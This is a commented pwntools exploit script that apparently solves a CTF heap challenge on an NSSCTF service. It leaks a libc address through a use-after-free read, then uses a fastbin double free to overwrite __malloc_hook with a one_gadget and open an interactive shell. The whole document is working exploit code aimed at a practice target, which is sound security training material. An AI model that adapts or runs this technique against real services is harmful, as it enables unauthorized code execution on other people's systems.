| from pwn import *
# Connection to the challenge service plus the two binaries used for symbol lookup.
io = remote(host="node5.anna.nssctf.cn", port=22876)
# `elf` is loaded but not referenced anywhere else in this listing; only `libc.sym` is used.
elf = ELF(path="./vuln")
libc = ELF(path="./libc-2.31.so")
# context(...) and context.update(...) are the same call in pwntools.
context.update(os='linux', arch='amd64')
def debug():
    """Attach gdb to the live connection `io` (module global); no return value."""
    gdb.attach(io)
def malloc(idx, size, message):
    """Drive menu option 1 of the service: answer the Index and Size prompts,
    then send `message` (raw bytes) at the Content prompt.

    `message` goes through sendafter(), i.e. without a trailing newline,
    unlike the index and size answers which are sent as lines.
    """
    io.sendlineafter(b'4. Exit\n', b'1')
    for prompt, answer in ((b'Index: ', idx), (b'Size: ', size)):
        io.sendlineafter(prompt, f"{answer}".encode())
    io.sendafter(b'Content: ', message)
def free(idx):
    """Drive menu option 2 of the service for slot `idx`.

    The script body calls this twice on the same slot; whether the service
    tolerates that is a property of the target, not checked here.
    """
    option = b'2'
    io.sendlineafter(b'4. Exit\n', option)
    io.sendlineafter(b'Index: ', f"{idx}".encode())
def show(idx):
    """Drive menu option 3 of the service for slot `idx`; the caller reads
    whatever the service prints back (see the leak stage below)."""
    option = b'3'
    io.sendlineafter(b'4. Exit\n', option)
    io.sendlineafter(b'Index: ', f"{idx}".encode())
# Offset into the shipped libc-2.31.so; it is only ever used as libc_base + one_gadget below,
# so it is tied to that exact libc build.
one_gadget = 0xe3b01

# Stage 1: obtain a libc address. Nine 0x80-byte slots are allocated, the first
# eight are freed, and slot 7 (already freed) is shown. Reading back a pointer from
# a freed slot is the service-side weakness this stage relies on; presumably the
# service keeps using slot pointers after free — a fix would clear them on free.
for slot in range(9):
    malloc(slot, 0x80, b'a')
for slot in range(8):
    free(slot)
show(7)

# Take the six bytes ending at the first 0x7f byte and zero-extend to 8 bytes.
leaked_ptr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# The leaked value is assumed to sit 0x70 past __malloc_hook (libc-2.31 layout) — TODO confirm
# against the shipped libc if this ever stops matching.
libc_base = leaked_ptr - 0x70 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
# Stage 2: ten 0x20-byte slots; free 0..7, then free 8, 9 and 8 again (slot 8 is
# passed to free() twice). Seven slots are re-allocated with filler, slot 7 is then
# allocated with a libc address as its content, two more filler allocations follow,
# and slot 10 is allocated with libc_base + one_gadget as content.
for slot in range(10):
    malloc(slot, 0x20, b'a')
for slot in range(8):
    free(slot)
for slot in (8, 9, 8):
    free(slot)
for slot in range(7):
    malloc(slot, 0x20, b'a')

hook_addr = libc_base + libc.sym["__malloc_hook"]
malloc(7, 0x20, p64(hook_addr))
for slot in (8, 9):
    malloc(slot, 0x20, b'a')
malloc(10, 0x20, p64(libc_base + one_gadget))
# Stage 3: one more allocation request through the menu (index 1, size 32).
# The malloc() helper is deliberately not used here: unlike it, no Content is
# sent, and the script hands the connection to the user straight after the Size prompt.
for prompt, answer in ((b'4. Exit\n', b'1'), (b'Index: ', b'1'), (b'Size: ', b'32')):
    io.sendlineafter(prompt, answer)
io.interactive()